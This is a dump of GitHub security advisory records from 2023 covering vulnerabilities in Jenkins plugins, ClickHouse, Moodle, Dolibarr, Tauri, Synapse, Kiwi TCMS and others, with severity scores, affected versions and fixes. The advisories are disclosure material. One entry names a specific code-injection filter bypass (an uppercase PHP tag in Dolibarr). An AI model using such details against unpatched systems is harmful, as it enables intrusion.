|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26128'}, {'type': 'PACKAGE', 'url': 'https://github.com/liujunyang/keep-module-latest'}, {'type': 'WEB', 'url': 'https://github.com/liujunyang/keep-module-latest/blob/master/index.js%23L50'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-KEEPMODULELATEST-3157165'}]
|
{'cwe_ids': ['CWE-20', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-30T20:07:35Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-49f2-j3pp-22jm
|
2023-05-17T03:47:59Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-33003']
|
Jenkins Tag Profiler Plugin vulnerable to Cross-Site Request Forgery
|
Jenkins Tag Profiler Plugin 0.2 and earlier does not perform a permission check in an HTTP endpoint.
This allows attackers with Overall/Read permission to reset profiler statistics.
Additionally, this HTTP endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
As of publication of this advisory, there is no fix.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:tag-profiler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33003'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-3083'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:47:59Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g8ph-74m6-8m7r
|
2023-05-12T20:18:51Z
|
2023-05-12T20:18:51Z
| null |
[]
|
ClickHouse vulnerable to client certificate password exposure in client exception
|
### Summary
As initially reported in issue #1331, when client certificate authentication is enabled with password protection, the password (referred to as the client option `sslkey`) may be exposed in client exceptions (e.g., ClickHouseException or SQLException). This vulnerability can potentially lead to unauthorized access, data breaches, and violations of user privacy.
### Details
During the handling of ClickHouseException, the client certificate password may be inadvertently exposed when sslkey is specified. This issue can arise when an exception is thrown during the execution of a query or a database operation. The client certificate password is then included in the exception message, which could be logged or exposed to unauthorized parties.
### Impact
This vulnerability enables an attacker with access to client exception error messages or logs to obtain client certificate passwords, potentially allowing unauthorized access to sensitive information, data manipulation, and denial of service attacks. The extent of the risk depends on the specific implementation and usage of the affected systems. However, any exposure of client certificate passwords should be treated as a high-priority security concern.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.clickhouse:clickhouse-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.clickhouse:clickhouse-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.clickhouse:clickhouse-r2dbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r'}, {'type': 'WEB', 'url': 'https://github.com/ClickHouse/clickhouse-java/issues/1331'}, {'type': 'WEB', 'url': 'https://github.com/ClickHouse/clickhouse-java/pull/1334'}, {'type': 'PACKAGE', 'url': 'https://github.com/ClickHouse/clickhouse-java'}, {'type': 'WEB', 'url': 'https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:18:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vcxh-qvgr-9fw9
|
2023-05-17T12:59:15Z
|
2023-05-10T06:30:27Z
| null |
['CVE-2023-26126']
|
m.static Directory Traversal vulnerability
|
All versions of the package m.static are vulnerable to Directory Traversal due to improper input sanitization of the path being requested via the requestFile function.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'm.static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26126'}, {'type': 'WEB', 'url': 'https://gist.github.com/lirantal/dcb32c11ce87f5aafd2282b90b4dc998'}, {'type': 'PACKAGE', 'url': 'https://github.com/ivoputzer/m.static'}, {'type': 'WEB', 'url': 'https://github.com/ivoputzer/m.static/blob/master/index.js#L19'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-MSTATIC-3244915'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-11T20:39:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-mvfv-w3fq-xp67
|
2023-05-24T18:04:31Z
|
2023-05-24T15:30:27Z
| null |
['CVE-2023-33941']
|
Cross-site scripting in Liferay Portal
|
Multiple cross-site scripting (XSS) vulnerabilities in the Plugin for OAuth 2.0 module's OAuth2ProviderApplicationRedirect class in Liferay Portal 7.4.3.41 through 7.4.3.52, and Liferay DXP 7.4 update 41 through 52 allow remote attackers to inject arbitrary web script or HTML via the (1) code, or (2) error parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.3.41'}, {'fixed': '7.4.3.53'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33941'}, {'type': 'PACKAGE', 'url': 'https://github.com/liferay/liferay-portal'}, {'type': 'WEB', 'url': 'https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2023-33941'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T18:04:31Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-frqx-jfcm-6jjr
|
2023-05-26T19:39:03Z
|
2023-05-26T19:39:03Z
| null |
['CVE-2023-33199']
|
malformed proposed intoto entries can cause a panic
|
### Impact
A malformed proposed entry of the `intoto/v0.0.2` type can cause a panic on a thread within the Rekor process. The thread is recovered so the client receives a 500 error message and service still continues, so the availability impact of this is minimal.
### Patches
This is fixed in v1.2.0 of Rekor.
### Workarounds
No
### References
Discovered by OSS-Fuzz
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/sigstore/rekor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/sigstore/rekor/security/advisories/GHSA-frqx-jfcm-6jjr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33199'}, {'type': 'WEB', 'url': 'https://github.com/sigstore/rekor/commit/140c5add105179e5ffd9e3e114fd1b6b93aebbd4'}, {'type': 'PACKAGE', 'url': 'https://github.com/sigstore/rekor'}]
|
{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-26T19:39:03Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h3qr-39j9-4r5v
|
2023-05-01T13:42:44Z
|
2023-05-01T13:42:44Z
| null |
['CVE-2023-30853']
|
Data written to GitHub Actions Cache may expose secrets
|
### Impact
This vulnerability impacts GitHub workflows using the [Gradle Build Action](https://github.com/marketplace/actions/gradle-build-action) that have executed the Gradle Build Tool with the [configuration cache](https://docs.gradle.org/current/userguide/configuration_cache.html) enabled, potentially exposing secrets configured for the repository.
Secrets configured for GitHub Actions are normally passed to the Gradle Build Tool via environment variables. Due to the way that the Gradle Build Tool records these environment variables, they may be persisted into an entry in the GitHub Actions cache. This data stored in the GitHub Actions cache can be read by a GitHub Actions workflow running in an untrusted context, such as that running for a Pull Request submitted by a developer via a repository fork.
This vulnerability was discovered internally through code review, and we have not seen any evidence of it being exploited in the wild. However, in addition to upgrading the Gradle Build Action, you should delete any potentially vulnerable cache entries and may choose to rotate any potentially affected secrets ([see Remediation](#Remediation)).
### Patches
[Gradle Build Action v2.4.2](https://github.com/gradle/gradle-build-action/releases/tag/v2.4.2) (and newer) no longer save this sensitive data for later use, preventing ongoing leakage of secrets via the GitHub Actions Cache. We strongly recommend that all users of the Gradle Build Action upgrade to `v2.4.2` (or simply `v2`) immediately.
### Remediation
While upgrading to the latest version of the Gradle Build Action will prevent leakage of secrets going forward, additional actions may be required due to current or previous GitHub Actions Cache entries containing this information.
Current cache entries will remain vulnerable until they are forcibly deleted or they expire naturally after 7 days of not being used. Potentially vulnerable entries can be easily identified in the GitHub UI by searching for a cache entry with key matching `configuration-cache-*`. We recommend that users of the Gradle Build Action inspect their list of cache entries and [manually delete any that match this pattern](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows#deleting-cache-entries).
While we have not seen any evidence of this vulnerability being exploited, we recommend cycling any repository secrets if you cannot be certain that these have not been compromised. Compromise could occur if you run a GitHub Actions workflow for a pull request attempting to exploit this data.
Warning signs to look for in a pull request include:
- Making changes to GitHub Actions workflow files in a way that may attempt to read/extract data from the Gradle User Home or <project-root>/.gradle directories.
- Making changes to Gradle build files or other executable files that may be invoked by a GitHub Actions workflow, in a way that may attempt to read/extract information from these locations.
### Workarounds
We strongly recommend that all users upgrade to the latest version of the Gradle Build Action as soon as possible, and delete any potentially vulnerable cache entries from the GitHub Actions cache ([see Remediation](#Remediation)).
If for some reason this is not possible, users can limit the impact of this vulnerability:
- If the Gradle project does not opt-in to using the configuration cache, then it is not vulnerable.
- If the Gradle project does opt-in to using the configuration-cache by default, then the `--no-configuration-cache` command-line argument can be used to disable this feature in a GitHub Actions workflow.
In any case, we recommend that users carefully inspect any pull request before approving the execution of GitHub Actions workflows. It may be prudent to require approval for all PRs from external contributors, as described [here](https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-github-actions-settings-for-a-repository#controlling-changes-from-forks-to-workflows-in-public-repositories).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'GitHub Actions', 'name': 'gradle/gradle-build-action'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/gradle/gradle-build-action/security/advisories/GHSA-h3qr-39j9-4r5v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30853'}, {'type': 'PACKAGE', 'url': 'https://github.com/gradle/gradle-build-action'}, {'type': 'WEB', 'url': 'https://github.com/gradle/gradle-build-action/releases/tag/v2.4.2'}]
|
{'cwe_ids': ['CWE-200', 'CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:42:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-x7c2-7wvg-jpx7
|
2023-06-02T22:22:57Z
|
2023-05-22T19:39:46Z
| null |
['CVE-2023-32686']
|
kiwitcms vulnerable to stored XSS via unrestricted files upload
|
### Impact
Kiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded, see [GHSA-fwcf-753v-fgcj](https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-fwcf-753v-fgcj) and Content-Security-Policy definition to prevent cross-site-scripting attacks, see [GHSA-2wcr-87wf-cf9j](https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-2wcr-87wf-cf9j).
The upload validation checks were not robust enough which left the possibility of an attacker to circumvent them and upload a potentially dangerous file. Exploting this flaw a combination of files could be uploaded so that they work together to circumvent the existing Content-Security-Policy and allow execution of arbitrary JavaScript in the browser.
### Patches
- File upload validation code has been improved
- Kiwi TCMS will now force `Content-Type: text/plain` when serving uploaded files
### Workarounds
1) Force the Content-Type header via a custom Django middleware, see `ExtraHeadersMiddleware` in https://github.com/kiwitcms/Kiwi/blob/master/tcms/core/middleware.py#L23 and/or
2) Force the Content-Type header via Nginx overrides, see `location /uploads/` in https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf
### References
Disclosed by [Antonio Spataro](https://huntr.dev/bounties/db75275f-8bcd-482b-ae12-feff660d4794) and [ek1ng](https://huntr.dev/bounties/46d5b535-bdff-4b98-8691-a907591fcf10/). Additional credits to [Ahmed Rabeaa Mosa](https://huntr.dev/bounties/cbc2676a-90ff-457f-9cdc-2a7981f960f3/).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-2wcr-87wf-cf9j'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-fwcf-753v-fgcj'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-x7c2-7wvg-jpx7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32686'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/05/22/kiwi-tcms-123/'}]
|
{'cwe_ids': ['CWE-434', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T19:39:46Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9wqr-5jp4-mjmh
|
2023-06-06T18:34:23Z
|
2023-05-29T21:30:17Z
| null |
['CVE-2023-30253']
|
Dolibarr vulnerable to remote code execution via uppercase manipulation
|
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '17.0.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30253'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'https://www.swascan.com/security-advisory-dolibarr-17-0-0/'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-30T20:06:23Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4wm2-cwcf-wwvp
|
2023-05-03T21:57:22Z
|
2023-05-03T21:57:22Z
| null |
['CVE-2023-31134']
|
Tauri Open Redirect Vulnerability Possibly Exposes IPC to External Sites
|
### Impact
The Tauri IPC is usually strictly isolated from external websites but the isolation can be bypassed by redirecting an existing Tauri window to an external website. This is either possible by an application implementing a feature for users to visit arbitrary websites or due to a bug allowing the open redirect[^open-redirect].
This allows the external website access to the IPC layer and therefore to all configured and exposed Tauri API endpoints and application specific implemented Tauri commands.
### Patches
This issue has been patched in the latest release and was backported to all previous `1.x` releases.
### Workarounds
Prevent arbitrary input in redirect features. Only allow trusted websites access to the IPC.
### References
The feature to enable this behavior in a more constrained way was introduced in the `1.3` release and documentation around this can be found in the [documentation](https://tauri.app/v1/api/config/#securityconfig.dangerousremotedomainipcaccess).
[^open-redirect]: [https://en.wikipedia.org/wiki/Open_redirect](https://en.wikipedia.org/wiki/Open_redirect)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'tauri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.9'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tauri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'tauri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.5'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/security/advisories/GHSA-4wm2-cwcf-wwvp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31134'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/commit/9c0593c33af52cd9e00ec784d15f63efebdf039c'}, {'type': 'WEB', 'url': 'https://en.wikipedia.org/wiki/Open_redirect'}, {'type': 'PACKAGE', 'url': 'https://github.com/tauri-apps/tauri'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/releases/tag/tauri-v1.0.9'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/releases/tag/tauri-v1.1.4'}, {'type': 'WEB', 'url': 'https://github.com/tauri-apps/tauri/releases/tag/tauri-v1.2.5'}, {'type': 'WEB', 'url': 'https://tauri.app/v1/api/config/#securityconfig.dangerousremotedomainipcaccess'}, {'type': 'WEB', 'url': 'https://www.github.com/tauri-apps/tauri/commit/58ea0b45268dbd46cbac0ebb0887353d057ca767'}, {'type': 'WEB', 'url': 'https://www.github.com/tauri-apps/tauri/commit/fa90214b052b1a5d38d54fbf1ca422b4c37cfd1f'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-03T21:57:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h538-r9x6-rcmc
|
2023-05-25T19:07:28Z
|
2023-05-18T03:30:20Z
| null |
['CVE-2023-30124']
|
LavaLite vulnerable to Cross Site Scripting
|
LavaLite v9.0.0 is vulnerable to Cross Site Scripting (XSS).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30124'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/issues/389#issue-1636041104'}, {'type': 'PACKAGE', 'url': 'https://github.com/LavaLite/cms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-18T17:27:27Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-45cj-f97f-ggwv
|
2023-06-02T23:31:54Z
|
2023-05-24T17:20:43Z
| null |
['CVE-2022-39335']
|
Synapse does not apply enough checks to servers requesting auth events of events in a room
|
### Impact
Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. The Matrix Federation API allows remote homeservers to request the *authorisation events* of events in a room. This is necessary so that a homeserver receiving some events can validate that those events are legitimate and permitted in their room.
However, in versions of Synapse up to and including 1.68.0, a Synapse homeserver answering a query for authorisation events does not sufficiently check that the requesting server should be able to access them.
Authorisation events include power level events (the list of user IDs and their power levels at the time) and relevant membership events (including the display name of the sender of that event), as well as events like `m.room.create`, `m.room.third_party_invite` and `m.room.join_rules`. Non-authorisation events are unaffected, so it isn't possible to e.g. extract message contents this way.
This issue is only exploitable when a malicious actor knows the ID of a target room and the ID of an event from that room. In most cases, this makes exploitation infeasible. This issue is of negligible consequence for public rooms given that any server can easily join the room in order to be allowed to view authorisation events. Further, deployments in a closed federation where all homeservers are trustworthy are not affected.
### Patches
The issue was patched in Synapse 1.69.0. Homeserver administrators are advised to upgrade.
### Workarounds
Synapse can be configured with a list of servers that it is allowed to federate with [`federation_domain_whitelist`]. If this list is in use and all the servers on the list are trusted not to exploit this issue, then this issue is of no consequence.
This workaround is not practical for homeservers participating in open federation as interaction with any server not on the list would have to happen indirectly through servers that are, leading to inconsistent delays in message delivery.
[`federation_domain_whitelist`]: https://matrix-org.github.io/synapse/v1.68/usage/configuration/config_documentation.html#federation_domain_whitelist
### References
Fixed in https://github.com/matrix-org/synapse/pull/13823.
### For more information
If you have any questions or comments about this advisory, e-mail us at security@matrix.org.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.69.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-45cj-f97f-ggwv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-39335'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/issues/13288'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/13823'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-synapse/PYSEC-2023-65.yaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T2MBNMZAFY4RCZL2VGBGAPKGB4JUPZVS/'}]
|
{'cwe_ids': ['CWE-200', 'CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:20:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7mmc-22g7-3xq2
|
2023-05-11T14:02:45Z
|
2023-05-02T21:31:48Z
| null |
['CVE-2023-30944']
|
Moodle SQL Injection vulnerability
|
The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in external Wiki method for listing pages. A remote attacker can send a specially crafted request to the affected application and execute limited SQL commands within the application database.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0-rc2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30944'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/5521d1d6e8bb8bebb76ad8154095f6b18ea26e7f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2188606'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/54TM5H5PDUDYXOQ7X7PPYWP4AJDAE73I/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MZBWRVUJF7HI53XCJPJ3YJZPOV5HBRUY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PBFSXRYLT4ICKJVQSRBAOUDMDRVSVBLS/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=446286'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-77187'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T23:13:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-33hq-f2mf-jm3c
|
2023-06-01T04:07:20Z
|
2023-05-25T16:58:48Z
| null |
['CVE-2023-33191']
|
kyverno seccomp control can be circumvented
|
### Impact
Users of the podSecurity (`validate.podSecurity`) subrule in Kyverno versions v1.9.2 and v1.9.3 may be unable to enforce the check for the Seccomp control at the baseline level when using a `version` value of `latest`. There is no effect if a version number is referenced instead. See the [documentation](https://kyverno.io/docs/writing-policies/validate/#pod-security) for information on this subrule type. Users of Kyverno v1.9.2 and v1.9.3 are affected.
### Patches
v1.9.4
v1.10.0
### Workarounds
To work around this issue without upgrading to v1.9.4, temporarily install individual policies for the respective Seccomp checks in baseline [here](https://kyverno.io/policies/pod-security/baseline/restrict-seccomp/restrict-seccomp/) and restricted [here](https://kyverno.io/policies/pod-security/restricted/restrict-seccomp-strict/restrict-seccomp-strict/).
### References
* https://kyverno.io/docs/writing-policies/validate/#pod-security
* https://github.com/kyverno/kyverno/pull/7263
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/kyverno/kyverno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.2'}, {'fixed': '1.9.4'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/security/advisories/GHSA-33hq-f2mf-jm3c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33191'}, {'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/pull/7263'}, {'type': 'PACKAGE', 'url': 'https://github.com/kyverno/kyverno'}, {'type': 'WEB', 'url': 'https://github.com/kyverno/kyverno/releases/tag/v1.9.4'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-25T16:58:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f7qw-jj9c-rpq9
|
2023-05-31T23:38:28Z
|
2023-05-31T23:38:28Z
| null |
['CVE-2023-32684']
|
In Lima, a malicious disk image could read a single file on the host filesystem as a qcow2/vmdk backing file
|
> **Note**
>
> The official templates of Lima, and the well-known third party products (Colima, Rancher Desktop, and Finch) are *unlikely* to be affected by this issue.
### Impact
A virtual machine instance with a malicious disk image could read a single file on the host filesystem, even when no filesystem is mounted from the host.
To exploit this issue, the attacker has to embed the target file path (an absolute or a relative path from the instance directory) in a malicious disk image, as the [qcow2 (or vmdk) backing file path string](https://gitlab.com/qemu-project/qemu/-/blob/v8.0.0/docs/interop/qcow2.txt#L23-L34).
As Lima refuses to run as the root, it is practically impossible for the attacker to read the entire host disk via `/dev/rdiskN`.
Also, practically, the attacker cannot read at least the first 512 bytes (MBR) of the target file.
### Patches
Patched in Lima v0.16.0, by prohibiting using a backing file path in the VM base image.
### Workarounds
Do not use an untrusted disk image.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/lima-vm/lima'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.16.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/lima-vm/lima/security/advisories/GHSA-f7qw-jj9c-rpq9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32684'}, {'type': 'WEB', 'url': 'https://github.com/lima-vm/lima/commit/01dbd4d9cabe692afa4517be3995771f0ebb38a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/lima-vm/lima'}, {'type': 'WEB', 'url': 'https://github.com/lima-vm/lima/releases/tag/v0.16.0'}]
|
{'cwe_ids': ['CWE-552'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-31T23:38:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-h3hg-r97v-5r9w
|
2023-05-17T03:06:59Z
|
2023-05-16T18:30:16Z
| null |
['CVE-2023-32984']
|
Jenkins TestNG Results Plugin Stored Cross-site Scripting vulnerability
|
Jenkins TestNG Results Plugin 730.v4c5283037693 and earlier does not escape several values that are parsed from TestNG report files and displayed on the plugin’s test information pages.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide a crafted TestNG report file.
TestNG Results Plugin 730.732.v959a_3a_a_eb_a_72 escapes the affected values that are parsed from TestNG report files.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
|
